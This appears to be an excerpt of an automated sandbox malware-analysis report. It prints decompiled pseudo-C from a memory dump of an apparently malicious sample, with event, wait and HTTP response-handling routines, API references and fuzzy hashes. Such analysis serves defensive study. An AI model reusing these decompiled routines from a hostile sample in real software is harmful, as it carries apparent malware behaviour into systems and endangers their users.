                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04F6A946
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 04F6A9BA
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F6A9DD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F6AA88
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 943265810-0
                                                                                                                                                                                                    • Opcode ID: f17aaa090c5e05549183f76112cf2ce701d57359c73cbf5e3f084d943a6ca405
                                                                                                                                                                                                    • Instruction ID: ad128e6ff193a886906d27d7f545b34f983cfad1f703d2a0d436668c9ea72322
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f17aaa090c5e05549183f76112cf2ce701d57359c73cbf5e3f084d943a6ca405
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D416D71A00208FFE7319FA1DD48E9B7BBDEB8A744F10495AF553E1090E775A946CB20
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                    			E04F62303(void* __eax) {
                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                    				intOrPtr* _t37;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                    				long _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t59 = __eax;
                                                                                                                                                                                                    				_t58 = 0;
                                                                                                                                                                                                    				ResetEvent( *(__eax + 0x1c));
                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                    				_push(4);
                                                                                                                                                                                                    				_push( &_v20);
                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                    				if( *0x4f6d138() != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                    						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                    						return _t58;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x4f6d168(0, 1,  &_v12);
                                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                                    						_t58 = 8;
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t36 = E04F68D59(0x1000);
                                                                                                                                                                                                    					_v16 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                    						_t58 = 8;
                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                    						_t37 = _v12;
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                    					_push( &_v20);
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                    						_t56 =  *_t39;
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                                                                                                                                                                    						ResetEvent( *(_t59 + 0x1c));
                                                                                                                                                                                                    						_push( &_v8);
                                                                                                                                                                                                    						_push(0x1000);
                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                    						if( *0x4f6d138() != 0) {
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t58 = GetLastError();
                                                                                                                                                                                                    						if(_t58 != 0x3e5) {
                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                    							E04F6677C(_v16);
                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                    								_t58 = E04F61BFD(_v12, _t59);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t58 = E04F69837( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t58 = 0;
                                                                                                                                                                                                    						if(_v8 == 0) {
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_v8);
                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = GetLastError();
                                                                                                                                                                                                    				if(_t58 != 0x3e5) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					if(_t58 != 0) {
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = E04F69837( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                                                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                                                                                    					goto L21;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x04f62312
                                                                                                                                                                                                    0x04f62317
                                                                                                                                                                                                    0x04f62319
                                                                                                                                                                                                    0x04f6231e
                                                                                                                                                                                                    0x04f6231f
                                                                                                                                                                                                    0x04f62324
                                                                                                                                                                                                    0x04f62325
                                                                                                                                                                                                    0x04f62330
                                                                                                                                                                                                    0x04f62361
                                                                                                                                                                                                    0x04f62366
                                                                                                                                                                                                    0x04f62429
                                                                                                                                                                                                    0x04f6242c
                                                                                                                                                                                                    0x04f62432
                                                                                                                                                                                                    0x04f62432
                                                                                                                                                                                                    0x04f62373
                                                                                                                                                                                                    0x04f6237b
                                                                                                                                                                                                    0x04f62426
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62426
                                                                                                                                                                                                    0x04f62386
                                                                                                                                                                                                    0x04f6238b
                                                                                                                                                                                                    0x04f62390
                                                                                                                                                                                                    0x04f62418
                                                                                                                                                                                                    0x04f62419
                                                                                                                                                                                                    0x04f62419
                                                                                                                                                                                                    0x04f6241f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6241f
                                                                                                                                                                                                    0x04f62396
                                                                                                                                                                                                    0x04f62398
                                                                                                                                                                                                    0x04f6239e
                                                                                                                                                                                                    0x04f6239f
                                                                                                                                                                                                    0x04f6239f
                                                                                                                                                                                                    0x04f623a2
                                                                                                                                                                                                    0x04f623a5
                                                                                                                                                                                                    0x04f623ab
                                                                                                                                                                                                    0x04f623b0
                                                                                                                                                                                                    0x04f623b1
                                                                                                                                                                                                    0x04f623b6
                                                                                                                                                                                                    0x04f623b9
                                                                                                                                                                                                    0x04f623c4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f623cc
                                                                                                                                                                                                    0x04f623d4
                                                                                                                                                                                                    0x04f623fd
                                                                                                                                                                                                    0x04f62400
                                                                                                                                                                                                    0x04f62407
                                                                                                                                                                                                    0x04f62412
                                                                                                                                                                                                    0x04f62412
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62407
                                                                                                                                                                                                    0x04f623e0
                                                                                                                                                                                                    0x04f623e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f623e6
                                                                                                                                                                                                    0x04f623eb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f623ed
                                                                                                                                                                                                    0x04f623ed
                                                                                                                                                                                                    0x04f623f2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f623f4
                                                                                                                                                                                                    0x04f623f5
                                                                                                                                                                                                    0x04f623f8
                                                                                                                                                                                                    0x04f623f8
                                                                                                                                                                                                    0x04f6239f
                                                                                                                                                                                                    0x04f62338
                                                                                                                                                                                                    0x04f62340
                                                                                                                                                                                                    0x04f62359
                                                                                                                                                                                                    0x04f6235b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6235b
                                                                                                                                                                                                    0x04f6234c
                                                                                                                                                                                                    0x04f62350
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62356
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 04F62319
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F62332
                                                                                                                                                                                                      • Part of subcall function 04F69837: WaitForMultipleObjects.KERNEL32(00000002,04F6A9FB,00000000,04F6A9FB,?,?,?,04F6A9FB,0000EA60), ref: 04F69852
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 04F623AB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F623C6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2394032930-0
                                                                                                                                                                                                    • Opcode ID: fb9d5e335d25371fd2af404c49b010c217ebfd8cee683b4a29c01f5fb00bd245
                                                                                                                                                                                                    • Instruction ID: 175636ca18749cf3ffdaf6d0bb88d99d134207241531dddd25c1ddcaacb340d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9d5e335d25371fd2af404c49b010c217ebfd8cee683b4a29c01f5fb00bd245
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31F732A00204EBDB12AFA9DC44E6F77B9EF84350F1641A8E957D3191EB30F942DB10
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E04F62997(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t6;
                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    				short* _t19;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				signed int* _t28;
                                                                                                                                                                                                    				CHAR* _t30;
                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t6 =  *0x4f6d270; // 0xd448b889
                                                                                                                                                                                                    				_t32 = _a4;
                                                                                                                                                                                                    				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                    				_t8 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t3 = _t8 + 0x4f6e862; // 0x61636f4c
                                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                                    				_t30 = E04F65FC5(_t3, 1);
                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                    					_t25 = CreateEventA(0x4f6d2a8, 1, 0, _t30);
                                                                                                                                                                                                    					E04F6677C(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t12 =  *0x4f6d25c; // 0x4000000a
                                                                                                                                                                                                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04F6244A() != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t28 = _a8;
                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                    						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t31 = E04F68D99(_t32, 0);
                                                                                                                                                                                                    					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                    						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t19 =  *0x4f6d110( *_t32, 0x20);
                                                                                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                                                                                    						 *_t19 = 0;
                                                                                                                                                                                                    						_t19 = _t19 + 2;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t31 = E04F666F6(0,  *_t32, _t19, 0);
                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                    						if(_t25 == 0) {
                                                                                                                                                                                                    							L22:
                                                                                                                                                                                                    							return _t31;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                    							L20:
                                                                                                                                                                                                    							if(_t25 != 0) {
                                                                                                                                                                                                    								CloseHandle(_t25);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L22;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x04f62998
                                                                                                                                                                                                    0x04f6299f
                                                                                                                                                                                                    0x04f629a9
                                                                                                                                                                                                    0x04f629ad
                                                                                                                                                                                                    0x04f629b3
                                                                                                                                                                                                    0x04f629c2
                                                                                                                                                                                                    0x04f629c9
                                                                                                                                                                                                    0x04f629cd
                                                                                                                                                                                                    0x04f629df
                                                                                                                                                                                                    0x04f629e1
                                                                                                                                                                                                    0x04f629e1
                                                                                                                                                                                                    0x04f629e6
                                                                                                                                                                                                    0x04f629ed
                                                                                                                                                                                                    0x04f62a44
                                                                                                                                                                                                    0x04f62a44
                                                                                                                                                                                                    0x04f62a4a
                                                                                                                                                                                                    0x04f62a4c
                                                                                                                                                                                                    0x04f62a4c
                                                                                                                                                                                                    0x04f62a56
                                                                                                                                                                                                    0x04f62a5a
                                                                                                                                                                                                    0x04f62a6c
                                                                                                                                                                                                    0x04f62a6c
                                                                                                                                                                                                    0x04f62a70
                                                                                                                                                                                                    0x04f62a76
                                                                                                                                                                                                    0x04f62a76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62a06
                                                                                                                                                                                                    0x04f62a0b
                                                                                                                                                                                                    0x04f62a13
                                                                                                                                                                                                    0x04f62a17
                                                                                                                                                                                                    0x04f62a1b
                                                                                                                                                                                                    0x04f62a1b
                                                                                                                                                                                                    0x04f62a28
                                                                                                                                                                                                    0x04f62a2c
                                                                                                                                                                                                    0x04f62a30
                                                                                                                                                                                                    0x04f62a85
                                                                                                                                                                                                    0x04f62a8b
                                                                                                                                                                                                    0x04f62a8b
                                                                                                                                                                                                    0x04f62a3e
                                                                                                                                                                                                    0x04f62a42
                                                                                                                                                                                                    0x04f62a79
                                                                                                                                                                                                    0x04f62a7b
                                                                                                                                                                                                    0x04f62a7e
                                                                                                                                                                                                    0x04f62a7e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62a7b
                                                                                                                                                                                                    0x04f62a42
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62a2c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F65FC5: lstrlen.KERNEL32(04F65073,00000000,00000000,00000027,00000005,00000000,00000000,04F656A8,74666F53,00000000,04F65073,04F6D00C,?,04F65073), ref: 04F65FFB
                                                                                                                                                                                                      • Part of subcall function 04F65FC5: lstrcpy.KERNEL32(00000000,00000000), ref: 04F6601F
                                                                                                                                                                                                      • Part of subcall function 04F65FC5: lstrcat.KERNEL32(00000000,00000000), ref: 04F66027
                                                                                                                                                                                                    • CreateEventA.KERNEL32(04F6D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04F64D6D,?,00000001,?), ref: 04F629D8
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,04F64D6D,00000000,00000000,?,00000000,?,04F64D6D,?,00000001,?,?,?,?,04F628F1), ref: 04F62A38
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04F64D6D,?,00000001,?), ref: 04F62A66
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04F64D6D,?,00000001,?,?,?,?,04F628F1), ref: 04F62A7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                    • Opcode ID: 78b385e33bc782fde37f42459357c0401985136592abaf4309d6908eaf2c903f
                                                                                                                                                                                                    • Instruction ID: bc7875dd5b2073f8e8a8ce0ae972f73da939f85bfc8837eefd05274fb52b530d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78b385e33bc782fde37f42459357c0401985136592abaf4309d6908eaf2c903f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E210732A00356EBD7317EA9AD44A6B7399EF88B10B070665F953DB140DBB4EC038752
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                    			E04F6A359(void* __ecx, void* __esi) {
                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                    				long _t56;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t61 = __esi;
                                                                                                                                                                                                    				_t59 = __ecx;
                                                                                                                                                                                                    				_t60 =  *0x4f6d140; // 0x4f6ad01
                                                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                                    					_v20 = _t34;
                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                    						_push( &_v8);
                                                                                                                                                                                                    						_push(_t61 + 0x2c);
                                                                                                                                                                                                    						_push(0x20000013);
                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                    						_v8 = 4;
                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                    						if( *_t60() == 0) {
                                                                                                                                                                                                    							_t39 = GetLastError();
                                                                                                                                                                                                    							_v12 = _t39;
                                                                                                                                                                                                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								return _v12;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_v16 = 0;
                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                    							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                                    							_t58 = E04F68D59(_v8 + 1);
                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                    								_v12 = 8;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push( &_v16);
                                                                                                                                                                                                    								_push( &_v8);
                                                                                                                                                                                                    								_push(_t58);
                                                                                                                                                                                                    								_push(0x16);
                                                                                                                                                                                                    								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                    								if( *_t60() == 0) {
                                                                                                                                                                                                    									E04F6677C(_t58);
                                                                                                                                                                                                    									_v12 = GetLastError();
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                                    									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                                    					_v12 = _t56;
                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					_t42 = E04F69837( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                                    					_v12 = _t42;
                                                                                                                                                                                                    				} while (_t42 == 0);
                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x04f6a359
                                                                                                                                                                                                    0x04f6a359
                                                                                                                                                                                                    0x04f6a363
                                                                                                                                                                                                    0x04f6a369
                                                                                                                                                                                                    0x04f6a36c
                                                                                                                                                                                                    0x04f6a370
                                                                                                                                                                                                    0x04f6a376
                                                                                                                                                                                                    0x04f6a37b
                                                                                                                                                                                                    0x04f6a394
                                                                                                                                                                                                    0x04f6a397
                                                                                                                                                                                                    0x04f6a39b
                                                                                                                                                                                                    0x04f6a39f
                                                                                                                                                                                                    0x04f6a3a0
                                                                                                                                                                                                    0x04f6a3a5
                                                                                                                                                                                                    0x04f6a3a8
                                                                                                                                                                                                    0x04f6a3af
                                                                                                                                                                                                    0x04f6a3b6
                                                                                                                                                                                                    0x04f6a409
                                                                                                                                                                                                    0x04f6a40f
                                                                                                                                                                                                    0x04f6a415
                                                                                                                                                                                                    0x04f6a450
                                                                                                                                                                                                    0x04f6a456
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6a415
                                                                                                                                                                                                    0x04f6a3bc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6a3c3
                                                                                                                                                                                                    0x04f6a3d1
                                                                                                                                                                                                    0x04f6a3d4
                                                                                                                                                                                                    0x04f6a3d7
                                                                                                                                                                                                    0x04f6a3e3
                                                                                                                                                                                                    0x04f6a3e7
                                                                                                                                                                                                    0x04f6a449
                                                                                                                                                                                                    0x04f6a3e9
                                                                                                                                                                                                    0x04f6a3ec
                                                                                                                                                                                                    0x04f6a3f0
                                                                                                                                                                                                    0x04f6a3f1
                                                                                                                                                                                                    0x04f6a3f2
                                                                                                                                                                                                    0x04f6a3f4
                                                                                                                                                                                                    0x04f6a3fb
                                                                                                                                                                                                    0x04f6a439
                                                                                                                                                                                                    0x04f6a444
                                                                                                                                                                                                    0x04f6a3fd
                                                                                                                                                                                                    0x04f6a400
                                                                                                                                                                                                    0x04f6a404
                                                                                                                                                                                                    0x04f6a404
                                                                                                                                                                                                    0x04f6a3fb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6a3e7
                                                                                                                                                                                                    0x04f6a3bc
                                                                                                                                                                                                    0x04f6a380
                                                                                                                                                                                                    0x04f6a386
                                                                                                                                                                                                    0x04f6a389
                                                                                                                                                                                                    0x04f6a38e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6a41e
                                                                                                                                                                                                    0x04f6a426
                                                                                                                                                                                                    0x04f6a42b
                                                                                                                                                                                                    0x04f6a42e
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04F6A370
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 04F6A380
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F6A409
                                                                                                                                                                                                      • Part of subcall function 04F69837: WaitForMultipleObjects.KERNEL32(00000002,04F6A9FB,00000000,04F6A9FB,?,?,?,04F6A9FB,0000EA60), ref: 04F69852
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 04F6A43E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 602384898-0
                                                                                                                                                                                                    • Opcode ID: 458e27e1947cd5afdfb76db5479a2642a27eddb1ef8fd0fde2c04d96294d084a
                                                                                                                                                                                                    • Instruction ID: babcd19832d32096ee13623b94dc9d1f5238844d31ca513c03cc005f21258a51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458e27e1947cd5afdfb76db5479a2642a27eddb1ef8fd0fde2c04d96294d084a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80313EB5D00208FFDB21DFA5DD849AFBBB8EB09304F10496AD953E2550D735AA069F60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 40%
